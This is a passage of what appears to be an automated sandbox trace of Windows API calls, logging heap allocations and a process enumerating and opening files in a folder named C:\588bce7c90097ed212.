Flags=0x0, Size=0x30) returned 0x4de70 [0061.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.922] AreFileApisANSI () returned 1 [0061.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 39 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4e) returned 0x6d478 [0061.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=39 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DHtmlHeader.html") returned 39 [0061.922] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\DHtmlHeader.html" (normalized: "c:\\588bce7c90097ed212\\dhtmlheader.html"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6)) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.922] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.922] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DisplayIcon.ico", cAlternateFileName="DISPLA~1.ICO")) returned 1 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0061.923] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.923] AreFileApisANSI () returned 1 [0061.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\DisplayIcon.ico", lpUsedDefaultChar=0x0) returned 38 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.923] AreFileApisANSI () returned 1 [0061.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0061.923] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d738 [0061.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0061.924] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0061.924] GetFileType (hFile=0x410) returned 0x1 [0061.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0061.924] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.924] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.925] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.925] CloseHandle (hObject=0x410) returned 1 [0061.925] AreFileApisANSI () returned 1 [0061.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0061.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d528 [0061.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d528, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0061.925] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0061.925] GetFileType (hFile=0x410) returned 0x1 [0061.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0061.925] CloseHandle (hObject=0x410) returned 1 [0061.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.926] AreFileApisANSI () returned 1 [0061.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0061.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6cf50 [0061.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6cf50, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 38 [0061.926] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x159d5)) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Extended", cAlternateFileName="")) returned 1 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.927] AreFileApisANSI () returned 1 [0061.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Extended", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Extended", lpUsedDefaultChar=0x0) returned 31 [0061.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.928] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.928] AreFileApisANSI () returned 1 [0061.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0061.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0061.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended") returned 31 [0061.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended" (normalized: "c:\\588bce7c90097ed212\\extended"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.928] GetLastError () returned 0x5 [0061.928] GetLastError () returned 0x5 [0061.928] SetLastError (dwErrCode=0x5) [0061.928] GetLastError () returned 0x5 [0061.928] SetLastError (dwErrCode=0x5) [0061.928] GetLastError () returned 0x5 [0061.928] SetLastError (dwErrCode=0x5) [0061.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.928] AreFileApisANSI () returned 1 [0061.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0061.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x53640 [0061.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=31 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Extended") returned 31 [0061.928] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Extended" (normalized: "c:\\588bce7c90097ed212\\extended"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.929] GetLastError () returned 0x5 [0061.929] GetLastError () returned 0x5 [0061.929] SetLastError (dwErrCode=0x5) [0061.929] GetLastError () returned 0x5 [0061.929] SetLastError (dwErrCode=0x5) [0061.929] GetLastError () returned 0x5 [0061.929] SetLastError (dwErrCode=0x5) [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.929] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 